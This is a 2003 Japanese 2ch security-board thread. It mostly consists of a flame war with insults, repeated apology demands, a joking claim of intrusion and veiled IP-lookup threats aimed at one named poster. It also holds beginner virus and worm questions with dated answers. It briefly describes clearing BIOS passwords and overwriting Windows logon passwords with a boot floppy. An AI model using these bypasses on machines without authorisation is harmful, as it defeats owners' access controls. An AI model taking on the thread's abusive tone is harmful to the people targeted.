以上の主旨はセキュリティ初心者質問スレッドpart33
http://pc.2ch.net/test/read.cgi/sec/1068471471/
に投稿しましたが「主旨は了解したが、このスレは薮立ち入り禁止」との指摘を
受けましたので、あらためてここに投稿します。

192 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 12:02
>>190

本当にしつこい馬鹿ですね。いたるところにコピペ貼って。

それはWindows2000のセキュリティーホールを利用したパスワード回避の
手口でしょ?Windows updateをちゃんとしてるパソコンに通用するの
ですか?本当に今でも通用するなら日本語サイトにも警告があるはずだと
思います。また、そういうツールをあなたは入手できますか?

デスクトップ機のBIOSパスワードはBIOSバックアップ用リチウム電池を
はずせば簡単に解除できます。3分で解除可能です。これはシロウトでも
できます。一部のノートパソコンでも電池をはずすかジャンパでBIOS
パスワード解除できます。


193 :名無しさん@お腹いっぱい。:03/11/12 12:32
>>192
Link先の原文ちゃんと読んで書き込みしてるか?

194 :名無しさん@お腹いっぱい。:03/11/12 12:54
>>192
先に引用したマイクロソフトの同じ資料の数行先に、次のような記述があります
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/news/efs.asp
> Do these tools represent a flaw in Windows 2000?
> これらの(管理パスワードを無効にする)ツールはWindows2000の
> 何らかの欠陥を表しているのですか?
>
> No.
> ノー (以降詳細な理由の説明が続く)

薮パソユーザーは>>192
> 本当にしつこい馬鹿ですね。いたるところにコピペ貼って。
と暴言を吐くだけで指摘の根拠としてあげた資料を読もうともしていません。

薮パソユーザー ◆0fQkHdNop2 に虚偽の訂正と暴言の謝罪を要求します。

虚偽を流布し、根拠を挙げた指摘をいくら受けても暴言を吐くのみで虚偽に固執
することを繰り返す投稿者は「荒らし」以外のなにものでもありません。したがって
本人からの訂正と謝罪がないかぎり、荒らしに対する定型の警告を随時貼ることは
住民側の当然の自衛、抗議活動となるものと考えます。

195 :名無しさん@お腹いっぱい。:03/11/12 12:56
>>150
遅レスだけど、それってmpeg2コーデック(体験版?)が出してるんじゃなかったかな
俺の場合期限が切れたら、そのマークが画面中をうろつき回りましたよ

196 :名無しさん@お腹いっぱい。:03/11/12 13:01
少し頭を働かせれば、ちっとも不思議じゃないのに
http://pc.2ch.net/test/read.cgi/sec/1068471471/74
> >>65
>
> しかしルーター越えでポートスキャンされるのもめずらしいですね。
> ルーターに問題があるのでは?って明日これ見るかな?
> >>65氏のルーターはBRL-04AR ↓ですかね?
> http://www.sofmap.com/shop/product/tanpin.asp?PRDT_ID=1432995
> 不愉快だからレスしないつもりだったけど、あまりにめずらしいんで
> レスしてしまいました。

197 :名無しさん@お腹いっぱい。:03/11/12 13:01
こないといっときながら
http://pc.2ch.net/test/read.cgi/sec/1068471471/80
> 80 :薮パソユーザー ◆0fQkHdNop2 :03/11/11 20:58
> まあ、できるかぎりここに出ずに皆さんの回答者としてのお手並み
> 拝見しましょうか?

既に回答付いてるのに横取り。
http://pc.2ch.net/test/read.cgi/sec/1068471471/112
> 112 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 11:57
> 昨日の>>65氏の件ですが、>>82を見れば>>84氏や>>100氏の指摘のように
> その1台はWinnyのためにDMZに接続してる可能性が高いですね。
> だとすればIP変えても数分でZAの警告は出ますよ。
> ZAの警告が出ても防御しましたという報告だから気にする事はないですし
> 気になるならDMZでなく普通の設定にすれば良いでしょう。(ただし、
> そうするとWinnyができなくなるかもしれませんが)

「以前にわかっていました。」(爆笑 小学生かお前は。
http://pc.2ch.net/test/read.cgi/sec/1068471471/116
> 118 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 12:22
> >>116
>
> 私は、>>84氏や>>100氏以前にルーター越えのポートスキャンの
> 問題性を指摘してました。>>82を見て私もDMZについてコメント
> しようとしたら、その時点ではアクセス規制で投稿できなかっただけです。


198 :名無しさん@お腹いっぱい。:03/11/12 13:05
永久にアク禁にしたいよ。
http://pc.2ch.net/test/read.cgi/sec/1068471471/122
> よく言いますね。昨夜、一時、このスレにアクセス規制したくせに。

199 :名無しさん@お腹いっぱい。:03/11/12 13:09
ここは後出しジャンケンで優越感を味わうスレですか?

200 :名無しさん@お腹いっぱい。:03/11/12 13:49
薮はうざいからアク禁にしてやった。

201 :名無しさん@お腹いっぱい。:03/11/12 15:12
アクセス禁止の理由はこれ。薮は精神鑑定してもらえ。
質問・雑談スレ 14@運用情報板
http://qb3.2ch.net/test/read.cgi/operate/1067934488/649
> 649 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:03/11/11 17:47 ID:ar2P4yiW
> アクセス規制中です!!(0)
>
> ホストに 0 (ゼロ)があるとこの規制に引っかかって書けません。
> 現在原因究明中のようです。
> しばらく待つか、繋ぎ直しでIPが変わる人は繋ぎ直してみてください。

202 :名無しさん@お腹いっぱい。:03/11/12 15:37
>>201
違います。薮パソに侵入&BIOS書き換えでアク禁にしました。

203 :名無しさん@お腹いっぱい。:03/11/12 16:48
>>202
それは乙。今晩も頼む

204 :名無しさん@お腹いっぱい。:03/11/12 16:53
>>192
名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 12:02
>>190
> 本当にしつこい馬鹿ですね。いたるところにコピペ貼って。

検索もせず自分の無知に固執して虚偽を流布していたのはあなたでしたね。
この暴言を取り消し、謝罪してください。でなければあなたは荒らしですよ。

205 :名無しさん@お腹いっぱい。:03/11/12 20:36
薮パソユーザー様。まだお返事がいただけていませんが。

名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 12:02
>>190
> 本当にしつこい馬鹿ですね。いたるところにコピペ貼って。

このような誹謗、中傷、暴言にはあくまで取り消しと謝罪を要求して
まいりますからご承知おきください。

206 :名無しさん@お腹いっぱい。:03/11/12 21:00
>>205
粘着だな

207 :名無しさん@お腹いっぱい。:03/11/12 21:07
藪パソ vs 謝罪

208 :名無しさん@お腹いっぱい。:03/11/12 21:16
夕べは仕事の後ちょっとセキュ板覗いてからよその板に逝って
カキコしようとしたら「アク禁」と出たから正直ビックラこいたーよ。
まあすぐ動作報告スレにカキコしてみたら、お仲間がたくさんいて、
多分FOX★がcgiのアップデートでヴォケかましただけらしいと
わかったけどw

2chの動作報告はここで。 パート7
http://qb3.2ch.net/test/read.cgi/operate/1066276210/566-798
がみんな薮の敵のカキコだというなら…こりゃもうディルレヴァンガー
状態も近いな。



209 :名無しさん@お腹いっぱい。:03/11/12 21:18
>>206
薮パソ、とうとうコテハンを取り下げるのか

210 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 21:21
>>208

>多分FOX★がcgiのアップデートでヴォケかましただけらしいと


ボケかましたって初心者スレ@セキュ板の私のトリップだけ排除した
としか思えませんけどね。

211 :名無しさん@お腹いっぱい。:03/11/12 21:24
藪パソの傾向
質問に答える(てきとうに)→コテハン
叩きに反撃(ハンパに)→名無し

212 :名無しさん@お腹いっぱい。:03/11/12 21:39
>>210
http://qb3.2ch.net/test/read.cgi/operate/1068541245/
の600辺りから見てみれば、昨日何が起こったのか分かるはずだが。

簡単に言えば、昨日は2回規制が行われた。
一回目にホストに0が含まれる人全員が規制。
二回目に●持ちしかかけなくなる規制。

そのどちらかに引っかかったんだろ。

何か書き込みするたびに、恥さらすのはやめれ。

213 :名無しさん@お腹いっぱい。:03/11/12 21:45
ちなみに本当に規制されたかどうかは
http://qb3.2ch.net/sec2ch/
を見れば分かる。

214 :名無しさん@お腹いっぱい。:03/11/12 21:49
>>210
薮パソユーザー様。まだお返事がいただけていませんが。

名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 12:02
>>190
> 本当にしつこい馬鹿ですね。いたるところにコピペ貼って。

このような誹謗、中傷、暴言にはあくまで取り消しと謝罪を要求して
まいりますからご承知おきください。

215 :名無しさん@お腹いっぱい。:03/11/12 21:52
コテ名乗るの10年はやいぞ>藪医者

216 :名無しさん@お腹いっぱい。:03/11/12 22:31
>薮パソユーザー ◆0fQkHdNop2さんへ
薮パソウィルスというものがセキュ板に蔓延して
回答者も質問者も困惑しているのですが、
これを駆除する名案はないでしょうか。
お力をお貸し下さい。

217 :藪カンシーサー☆0fQkHdNop2:03/11/12 22:37
アンチドートでスキャンしてください。

ANTIDOTE for PC Viruses - SuperLite  (@vector)
http://www.vector.co.jp/soft/win95/util/se108623.html
↑これは、1番上のボタン押して、圧縮ファイル・電子メール確認
のチェックボックスにチェック入れてHDDを検査する。
(通常はローカルディスクC)
それから、最初に戻って上から3つ目のボタンクリックして
レジストリチェック。
検査が終了すれば最初の画面のプルダウンメニューで終了を選ぶ。

218 :名無しさん@お腹いっぱい。:03/11/12 22:51
すいません、教えてください。
一週間くらい前からデスクトップに変なショートカットが作成されました。

名前  ~
種類  ファイル
サイズ 183k

こまめに更新されているようです。
何回削除しても作成されます。

219 :名無しさん@お腹いっぱい。:03/11/12 22:53
おまえ「me」だろ。散々既出、検索ぐらい覚えろ。

220 :名無しさん@お腹いっぱい。:03/11/12 22:54
>>218
リンクを辿って元ファイルを削除(Safeモードなりなんなりで)

221 :名無しさん@お腹いっぱい。:03/11/12 23:01
>>218
板違いです。以下へ移動して下さい。

Outlook Express
http://pc2.2ch.net/test/read.cgi/software/1013383300/

222 :名無しさん@お腹いっぱい。:03/11/12 23:29
>>218
こちらのトップページにあります。
http://winfaq.jp/

223 :名無しさん@お腹いっぱい。:03/11/12 23:58
参考
http://www.cs.kyoto-wu.ac.jp/~mizuno/mizuno-daigaku-tsushin-1.html
http://www.cs.kyoto-wu.ac.jp/~mizuno/mizuno-daigaku-tsushin-2.html
http://www.cs.kyoto-wu.ac.jp/~mizuno/mizuno-daigaku-tsushin-3.html


224 :名無しさん@お腹いっぱい。:03/11/13 01:34
>>222さん
[ショートカット] タブの「作業フォルダ」に、~ ファイルを作成するフォルダのパスを記入します。
どうパスを変更すれば良いのでしょうか?


225 :218:03/11/13 02:40
>>219-223さん
解決しました。
スレ違いどうもすみませんでした。

226 :名無しさん@お腹いっぱい。:03/11/13 08:12
>>214
しつこく嫌がらせをして、相手が怒ると恐喝かよ(w
ヤの手口だな(w

227 :名無しさん@お腹いっぱい。:03/11/13 09:58
指摘されてその後逃げちゃったからな。

228 :薮パソユーザー ◆0fQkHdNop2 :03/11/13 10:34
上げときます。

229 :名無しさん@お腹いっぱい。:03/11/13 10:45
どうして重箱の隅をつつくようなことにはレスするのに
都合の悪いことにはレスしないんですか?
例:Outpost関連、fd/cd boots linux、11/11のアクセス規制について等々

230 :名無しさん@お腹いっぱい。:03/11/13 10:58
藪パソユーザーさん。あなたはマイクロソフトの技術情報をあげて
虚偽を指摘されても(http://pc.2ch.net/test/read.cgi/sec/1068471471/02
取り消そうとしないばかりか、

http://pc.2ch.net/test/read.cgi/sec/1068471471/110
名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
> 本当にしつこい馬鹿がいますね。

等々の暴言を吐いています。(これはあなたの嘘、暴言のほんの一例ですよ)

このような「コテハンで嘘をつき、指摘されても平然と固執、指摘者を罵倒」
というような状態が続くようでは質問板の機能にも悪影響があることは明らか
ですので、薮パソユーザー ◆0fQkHdNop2 さんには虚偽の取り消しと暴言の
謝罪をお願いしてまいりました。

残念ながらまだ回答をいただいておりません。ことの重要性を考慮し、ご回答を
いただけるまでお願いを続けさせていただきますのでご承知おきください。また
このような問題を初心者、部外者のみなさんに周知する必要があるとも考えて
おりますのであわせてご承知ください。

231 :薮パソユーザー ◆0fQkHdNop2 :03/11/13 11:12
>>229

スレ違いです。
Outpost関連→outpostスレ
fd/cd boots linux、11/11のアクセス規制→初心者スレ

232 :薮パソユーザー ◆0fQkHdNop2 :03/11/13 11:13
>>230

スレ違いです。→初心者スレ

233 :名無しさん@お腹いっぱい。:03/11/13 11:19
>>229
藪パソは自分の荒らしが原因でアク禁くらったと妄想して
質問・雑談スレ 14@運用情報板
http://qb3.2ch.net/test/read.cgi/operate/1067934488/849
> 昨夜、ホスト規制の後にこのスレ↓で私のトリップ狙い撃ちでcgi規制
> されませんでしたか?
> 私は初心者スレ↑で初心者にまじめに正しい回答をしてたら
> 回答できない馬鹿な名無し常連にねたまれて叩かれてます。
> おまけに、cgi規制があったというと被害妄想扱いされて困ってます。

スレにアフォを書き込む(実際はcgiアップデートのミス。2chの広い
範囲で書き込めなくなっていた)

呆れた住人に
http://qb3.2ch.net/test/read.cgi/operate/1067934488/857
857 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:03/11/12 16:13 ID:lfESJuAj
>>849
> 回答できない馬鹿な名無し常連に妬まれて、などという事を仰っていては、
> 妬まれても仕方が無いのでは?と外野からは見えてしまいますが。
>
> どちらにしろ、コンフィギレーションエラーはたまにあります。
> 同様な目にあった人がこのスレですら存在しています。
> 自意識過剰すぎですよ。

とたしなめれていた。しかもその後も「自分が狙い撃ちにされた」と妄想に
固執。こういう脳内構造してる回答者の回答には皆さんご注意、だなwww


234 :名無しさん@お腹いっぱい。:03/11/13 11:22

こんなメールが来ていましたがどうでしょうか?
まだ開いていません。


送信者 日 付 件   名 サイズ
Andrew 2003/11/12 vgjgoema 24k
Daniel 2003/11/12 jehzjzs 24k

235 :名無しさん@お腹いっぱい。:03/11/13 11:24
>>231
Outpostやその他、それ自体の質問ではなく、藪パソ氏のレスについての質問なので
それら、該当スレッドで聞くべき問題ではありません。

236 :名無しさん@お腹いっぱい。:03/11/13 11:27
>>234
スパムなりウイルスなりだろうから、消せ。

237 :名無しさん@お腹いっぱい。:03/11/13 12:20
>>234
心当たりないメールは手を触れずに速攻削除。送信者が外人だったら
まず百パーセンとウィールスかスパムか変態ナンパメールだ。件名や
添付ファイル名が無意味な文字列だったら二百パーセントウィールスw

238 :名無しさん@お腹いっぱい。:03/11/13 12:30
>>231 >>235のいうとおり。藪パソに対する質問なんだから藪が出没する
スレならどこのスレで質問してもいい。ましてここは藪が立てたスレだw

質問スレでなければ藪がどんなアフォを書こうと勝手。質問スレでは実害がある。
セキュ板質問スレでの藪の妄想電波大嘘罵倒誹謗撒き逃げはもう許さん、ということ。



239 :名無しさん@お腹いっぱい。:03/11/13 13:04
 

240 :名無しさん@お腹いっぱい。:03/11/13 13:13
キチガイ糞パソユーザー出て来いよ、第2のネオ麦茶候補なんだから(w

241 :薮パソユーザー ◆0fQkHdNop2 :03/11/13 13:28
>>234

ウィルスメールを集めるつもりがなければ削除してください。
ウィルスメールを集めたいなら、アンチドートでスキャンしてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504
アンチドートならメールフォルダ上からでも反応します。
メールフォルダからメールを取り出せばノートンとバスターも反応します。
しかし、それでも反応しないウィルス対策ソフトもあります。
(どこの社のソフトと明言すると、そこの社員に粘着されるので
言いませんが、ウィルス対策ソフトの検出力テストにも使えます。)

尚、メールから添付ファイルを分離すれば(新種・珍種以外のウィルス)
なら、すべてのウィルス対策ソフトは反応します。

242 ::03/11/13 13:30
ブラクラ注意

243 :名無しさん@お腹いっぱい。:03/11/13 13:32
ハァ?

244 :名無しさん@お腹いっぱい。:03/11/13 13:33
既出だったら申し訳ありません。
以前、某スピード計測サイトを利用中、突然パソコンがダウン自動的に再起動しました。
その後、ネットに繋がらなくなったため調べてみると、LANボードドライバが消えていました。
再度ドライバをインストール、無事繋がって事無きを得ました。
メーラーを開くとウイルスらしきメールが2通と、知らない人から「お宅のPCウイルス感染してますよ」というメールが1通。
ウイルスバスターを入れてたのにと憤慨しましたが、後処理を行いそれはそれで済んだかに思いました。
しかし、どうもブラウザの表示速度が遅くなった感じがして
調べた結果、下りのみ15Mあったものが2Mまでダウンしてました。上りは変化ありません(5Mくらい)。
他のパソコンでは症状がでないので、ケーブル・ルーター等は問題ないと思います。
新しいLANボードに交換、OS(98se)の再インストールもしてみましたがダメでした。
速度以外は問題なく動いているように思います。

PCに詳しくないため、何処が壊れたのかさっぱりわかりません。
他のサイト、パソコンに詳しい知人にも質問したのですが、明解な回答が得られませんでした。
判る方がいらっしゃいましたらよろしく御願いします。



245 :名無しさん@お腹いっぱい。:03/11/13 13:42
>>243
トリップ付け忘れてますよw

246 :薮パソユーザー ◆0fQkHdNop2 :03/11/13 13:53
>>244

ウィルスメールを受け取っても見たり添付ファイルを実行したり
しなければ感染しません。
また、Windowsをきちんとupdateしてたらメールを見ても添付ファイルを
実行しなければ感染しません。
添付ファイルを実行されたのですか?Windowsのupdateをしてなかった
のですか?

ウイルスらしきメールでもウィルスメールとは断言はできません。
知らない人から「お宅のPCウイルス感染してますよ」というメールが
あってもウソかもしれません。
ウイルスバスターをこまめにupdateしててリアルタイム検索してれば
感染の可能性は非常に低くなります。ただし、ウイルスバスターを無効化
するウィルスもあるのでアンチドートでスキャンしてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504
ウィルスに感染してるのか、感染してたらウィルス名がわからないと対策が
困難です。

247 ::03/11/13 13:57
精神的ブラクラ

248 :名無しさん@お腹いっぱい。:03/11/13 14:07
リンク先が間違っています。
http://pc.2ch.net/test/read.cgi/sec/1003987914/509

249 :名無しさん@お腹いっぱい。:03/11/13 14:12
>>244
>以前、某スピード計測サイトを利用中、突然パソコンがダウン自動的に再起動しました。
>その後、ネットに繋がらなくなったため調べてみると、LANボードドライバが消えていました。

Me使っていて同じようなことがあるけど、パソコンに負荷が掛かると勝手にダウンして再起動する。
俺の場合はサウンドドライバだったけど、OS再インストールで直った。

で、もしかしてWindowsupdateした?
http://pc2.2ch.net/test/read.cgi/win/1058432530/l50によると、
あるパッチを入れるとブラウザの調子が悪くなるらしいです。
で、再インストールしたんならウイルスは消えてるだろうし、
パケットサイズ変更とかの設定をし忘れてるなら設定してみるとか。

250 :名無しさん@お腹いっぱい。:03/11/13 14:13
>>241
遅すぎるんですけど(w

251 :名無しさん@お腹いっぱい。:03/11/13 14:13
(どこの社のソフトと明言すると、そこの社員に粘着されるので
言いませんが、ウィルス対策ソフトの検出力テストにも使えます。)


アンチドートの宣伝をするたび、何円もらえるんですか?

252 :名無しさん@お腹いっぱい。:03/11/13 14:15
このスレはチンパンジー愛ちゃん以下の脳みその薮パソを楽しくウォッチングするスレです。



比較してごめんなさい、愛ちゃん。

253 :名無しさん@お腹いっぱい。:03/11/13 14:22
http://qb3.2ch.net/test/read.cgi/operate/1067934488/849
これ、結局どうなったんですか?

254 :名無しさん@お腹いっぱい。:03/11/13 14:32
>>253
どーもこーも薮の自意識過剰で終了

255 :名無しさん@お腹いっぱい。:03/11/13 15:56
こいつから毎日のようにウィルス送られてくるねんけどどうしたらいい?

256 :255:03/11/13 15:57
Return-Path: <info@grandcomfort.co.jp>
Received: from mail.grandcomfort.co.jp (mail.grandcomfort.co.jp
[164.46.105.83])

こいつ

257 :255:03/11/13 15:58
こいつかな?
ttp://www.navi-x.co.jp/owners/interview04.htm

258 :名無しさん@お腹いっぱい。:03/11/13 16:03
>>255
普通に受信拒否したら?

259 :薮パソユーザー ◆0fQkHdNop2 :03/11/13 16:23
>>256-257

まあ、その人の所から来てるならその人のパソコンがウィルスに
感染してるのでしょうね。
ただ、Klezのように差出人偽装するウィルスもあるので断定は
できませんが、すでに↓を踏まえた上で差出人特定されたなら
知らせてあげても良いんじゃないですか?
http://pc.2ch.net/test/read.cgi/sec/1030175440/2

260 :255:03/11/13 16:23
してるんだけど、、、
毎回違うアドレスで来るから困ってる。
Kles_Hだからかなぁ

261 :名無しさん@お腹いっぱい。:03/11/13 17:50
初めてこの板に来ました。
どうしても解決することが出来ないため、
何らかの対策を教えていただけると助かります。

「Wincfgman32.exe」というプロセスが無駄にCPU使用率を
他プロセスと合わせて100%に持っていきます。
「SPOOLSV.exe」というプロセスもたまに見かけます。

Google、各種アンチウィルスメーカー、ここの過去ログを検索しましたが、
何も情報を得られませんでした。

いずれかのプロセスが起動しているときに、
explorerでのD&Dが聞かなくなったり、
ファイルの検索、レジストリエディタを起動すると、
数秒のうちに終了されてしまいます。
タスクマネージャーで強制終了を行おうとするとアクセスが拒否されてしまうため、
セーフモードでの自力駆除に成功しましたが、
次に通常モードで立ち上げるときには既に復活されています。

ウィルスバスター(パターンファイル676)でも引っかかりません。
どなたか情報お持ちの方いらっしゃいましたらご教授お願いします。

262 :名無しさん@お腹いっぱい。:03/11/13 18:10
>>261
msconfigでスタートアップの項目を精査
怪しいのをひとつずつ停止、再起動を繰り返しWincfgman32.exeが作成されなくなるまで
がんばる

もしかしたらで

スパイウェア削除ソフトSpybot 5
http://pc.2ch.net/test/read.cgi/sec/1057338156/l50
スパイウェア発見専用ソフト「Ad-aware」Part7
http://pc.2ch.net/test/read.cgi/sec/1058423961/l50

も試してみたら?

SPOOLSV.exeはともかくWincfgman32.exeという謎のプロセスが動いているのは怪しいね。
ちなみにFW入れてる? OSは何?

263 :名無しさん@お腹いっぱい。:03/11/13 20:45
>>261
Downloaded Program(ActiveXのキャッシュ)は見たかや?

Ad-awere とSpybotは一長一短あるから両方試したほうがいい。

アンチスパイかけてもダメなら…
被害対策の部屋サイトマップ
http://higaitaisaku.web.infoseek.co.jp/menu2.html
HighjackThisツールの使用方法
http://higaitaisaku.web.infoseek.co.jp/hijackthis.html
このツールはなかなかすぐれもの。アンチスパイが入り
こみそうなレジストリの値を監視、安全に削除できる。

それでも悪いのが戻ってくるようなら
【FWと併用】System Safety Monitor
http://pc.2ch.net/test/read.cgi/sec/1061788093/
使って何が悪さをしているのか監視する手もある。



264 :名無しさん@お腹いっぱい。:03/11/13 20:48
>>261
間違いなくBlaster系だと思うが、ノートンのページでオンラインスキャンしてきてみぃ。

265 :名無しさん@お腹いっぱい。:03/11/13 20:54
>>261
その手のは、レジストリのスタートアップの方に登録するから、そっちを探した方がいいね。
もしかしたら、サービスの方に登録されているかもしれないから、サービスも探した方がいい。

266 :名無しさん@お腹いっぱい。:03/11/13 22:21
初めまして、よろしくお願いします。
今日帰ってきてPCを見てみるとノートン先生が
W32.Spybot.Worm を発見、削除したというようなウイルス警告を出していました。
ログの時間は5:45この時間寝ていたのでPCは触っていません。
発生源:C:\DOCUMENTS AND SETTINGS\ALL USERS\DOCUMENTS\explore.exe
です。シマンテックのウイルス情報はこちら
http://www.symantec.com/region/jp/sarcj/data/w/w32.spybot.worm.html
なぜこのようなウイルスがこのフォルダに出来たのでしょう、
このままPCを使用していて問題ないのでしょうか。
今何をすべきかわからず、取り合えずウイルススキャンをかけています。


267 :名無しさん@お腹いっぱい。:03/11/13 22:24
ワームだからではないかと

268 :名無しさん@お腹いっぱい。:03/11/13 23:05
>266
PC電源入れたままだったの?
そうでなければ藻前さんのPCの時計が狂ってるとか無い?

269 :薮パソユーザー ◆0fQkHdNop2 :03/11/13 23:10
>>261

アンチドートでウィルスチェックしてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504

270 :薮パソユーザー ◆0fQkHdNop2 :03/11/13 23:20
>>266

まさか一晩中ファイル交換でパソコン放置してたのでは?
他にも何か放り込まれてるのかもしれませんね。
安全策を採るならWindows再インストール。
それが面倒ならアンチドートとPestPatrolでスキャンしてください。
http://pc.2ch.net/test/read.cgi/sec/1003987914/504

271 :266:03/11/13 23:26
レスありがとうございます。
267さん
ワームだから問題ないこういうものだということでしょうか。
268さん
PCの電源は入れたままです。
環境は常時接続ADSLモデム直でルーターはさんでいません、OSはXPHOMEです。
そのときはUNKNOWNでIRCに接続したまま放置でした。他のソフトは動いていません。



272 :名無しさん@お腹いっぱい。:03/11/13 23:35
>>271
だれも問題ないなんていってないだろ。
ワームがなんだか分かってレスしてるのか?

273 :名無しさん@お腹いっぱい。:03/11/13 23:55
構わん。安全対策の取れていないpcは、みんな壊れてしまっても自業自得だ。

274 :名無しさん@お腹いっぱい。:03/11/13 23:57
壊れる前に迷惑なモノをばらまきまくられては迷惑だ

275 :名無しさん@お腹いっぱい。:03/11/13 23:57
もう汚れてしまったPCのことをとやかく言っても始まらない
明日だけを見て生きるのだ

276 :名無しさん@お腹いっぱい。:03/11/14 00:00
AIDSに感染したから氏ぬまでヤリまくって
道連れ増やしてやろうというアレだな

277 :名無しさん@お腹いっぱい。:03/11/14 00:55
藪パソユーザーさん。あなたはマイクロソフトの技術情報をあげて虚偽を
指摘されても(http://pc.2ch.net/test/read.cgi/sec/1068471471/102)取り消そうとしないばかりか、

http://pc.2ch.net/test/read.cgi/sec/1068471471/110 名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
> 本当にしつこい馬鹿がいますね。

等々の暴言を吐いています。虚偽の取り消しと暴言の謝罪をお願いして
まいりましたがまだ回答をいただいておりません。回答がいただけるまで
お願いを続けさせていただきますのでご承知おきください。

278 :名無しさん@お腹いっぱい。:03/11/14 01:03
>薮パソユーザー
以下の二つの虚偽も訂正しなさい。

http://pc.2ch.net/test/read.cgi/sec/1001423524/152
> それから付け加えますと、共有というのは他のコンピューターを自分の
> コンピューターと同じように扱うという事なのでBIOSレベルに密接に
> 関連してると思いますけど。ただ、商業ベースのBIOSで共有の設定が
> できないだけでしょう。

http://pc.2ch.net/test/read.cgi/sec/1068471471/154
154 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 16:18
> >>150
>
> >「BIOSパスワードはBIOS書き換えウイルスの防御になる」
>
>
> これは機種によるみたいで、BIOSパスワードをはずさずに更新
> できるタイプには効力はありません。
> 誤解があるようなので補足しときます。

279 :名無しさん@お腹いっぱい。:03/11/14 02:01
藪 日本人の成人男性のほとんどは身長150センチ以下ですよ
他 おれの高校の同級生に150センチ以下なんかいねーよ。
藪 特殊な例を持ち出されても困ります。
他 文部科学省の統計に平均身長170何センチって出てるぞ。
藪 文部省の統計は明治時代のものですよ。
他 去年の調べだよ。つったくどこに明治時代の統計なんか出てくるんだ?
藪 表題には去年と書けば最新の情報ということで文部省の役人はポート
   が開くから安全でしょうが確実ではありません。公務員試験の改革は
   が年内に実行できるかは小泉と亀井の力関係次第ですが、詳しいこと
   はネットランナーの今年の1月号をを読んでください。さらに念のため
   アンチドートでスキャンしてください。「復元ポイント」も実行してください。
他 日本人の成人男性の身長が150センチ以下という話しはどうなったんだよ?
藪 http://pc.2ch.net/test/read.cgi/sec/1068471471/110
   本当にしつこい馬鹿がいますね。


280 :名無しさん@お腹いっぱい。:03/11/14 06:47
>>277
ホンに御前はヤのようなー






うぜぇーぜ、いい加減に消えろ

281 :薮パソユーザー ◆0fQkHdNop2 :03/11/14 12:34
上げときます。

282 :名無しさん@お腹いっぱい。:03/11/14 16:26
>>279
最後に「上げときます。 」追加よろ

283 :薮パソユーザー ◆0fQkHdNop2 :03/11/14 17:43
上げときます。

284 :名無しさん@お腹いっぱい。:03/11/14 17:51
キチガイが立てたスレを晒しあげておきます。

285 :名無しさん@お腹いっぱい。:03/11/14 17:52
藪って性格悪すぎ、ネット以外じゃ誰にも相手にされないんだろうな。
さすが毎日昼真っからここに顔出しに来るネット依存症なだけあるな。

286 :名無しさん@お腹いっぱい。:03/11/14 21:02
>>280
あとでアクセス禁止問題おきたときにあなたのIP調べさせてもらいます。
ご承知おきください。

287 :名無しさん@お腹いっぱい。:03/11/14 21:07
>>280
それ以外のプロバ所有の情報も裁判所の令状とれば調べれられますが
ご承知おきください。

288 :名無しさん@お腹いっぱい。:03/11/14 21:11
ええと、>>286-287って

> 藪パソ 関連だよなw ||||||||| |藪警告 ||||||||とかなんとか
目立つ標識つけてくれないかなー。


289 :名無しさん@お腹いっぱい。:03/11/14 21:14
>>283
藪パソユーザーさん。あなたはマイクロソフトの技術情報をあげて虚偽を
指摘されても(http://pc.2ch.net/test/read.cgi/sec/1068471471/102)取り消そうとしないばかりか、

http://pc.2ch.net/test/read.cgi/sec/1068471471/110 名前:薮パソユーザー ◆0fQkHdNop2 [] 投稿日:03/11/12 11:43
> 本当にしつこい馬鹿がいますね。

等々の暴言を吐いています。虚偽の取り消しと暴言の謝罪をお願いして
まいりましたがまだ回答をいただいておりません。回答がいただけるまで
お願いを続けさせていただきますのでご承知おきください。

290 :名無しさん@お腹いっぱい。:03/11/14 21:18
>>289 藪パソユーザーさん。
「上げときます」とトリップつきで無意味なカキコするからにはこのスレを
読んだはずですね? 暴言の謝罪をお願いします。 

291 :名無しさん@お腹いっぱい。:03/11/14 21:33
http://qb2.2ch.net/test/read.cgi/saku/1027430636/126
>叩きをする者の多くは初心者スレで満足に答えれない無能な者でやっかみから
>しつこくつきまとって妨害しています。

http://qb2.2ch.net/test/read.cgi/saku/1027430636/138
>私はボランティアで初心者スレ等で質問に回答したら、
>回答能力のない常連達に妬まれやっかみから集団叩きの
>被害にあってます。

とかには突っ込まなくていいのか?;;

292 :名無しさん@お腹いっぱい。:03/11/14 21:38
電波放ってますね。

293 :名無しさん@お腹いっぱい。:03/11/14 23:36
>薮パソユーザー
以下の二つの虚偽を訂正しなさい。

http://pc.2ch.net/test/read.cgi/sec/1001423524/152
> それから付け加えますと、共有というのは他のコンピューターを自分の
> コンピューターと同じように扱うという事なのでBIOSレベルに密接に
> 関連してると思いますけど。ただ、商業ベースのBIOSで共有の設定が
> できないだけでしょう。

http://pc.2ch.net/test/read.cgi/sec/1068471471/154
154 :薮パソユーザー ◆0fQkHdNop2 :03/11/12 16:18
> >>150
>
> >「BIOSパスワードはBIOS書き換えウイルスの防御になる」
>
>
> これは機種によるみたいで、BIOSパスワードをはずさずに更新
> できるタイプには効力はありません。
> 誤解があるようなので補足しときます。

294 :名無しさん@お腹いっぱい。:03/11/15 00:10
本当に頭悪いんだな。パスワード上書きした後はフロッピー引っこ抜いて、リブートすりゃ
Windowsが立ち上がるんだよ。
お前、馬鹿だからその先も一応書いといてやる。
その先は、さっき上書きしたパスワードでログオンすりゃいい。

http://pc.2ch.net/test/read.cgi/sec/1068471471/287
> >>278-279 これで最後にしてください。
>
> 一般論として書いてあるからです。(一般論で書いてるのは
> 別パーティションがあればそこに別のWindowsをインストール
> するだけで回避できると単純なシロウトでもできる方法を明示する
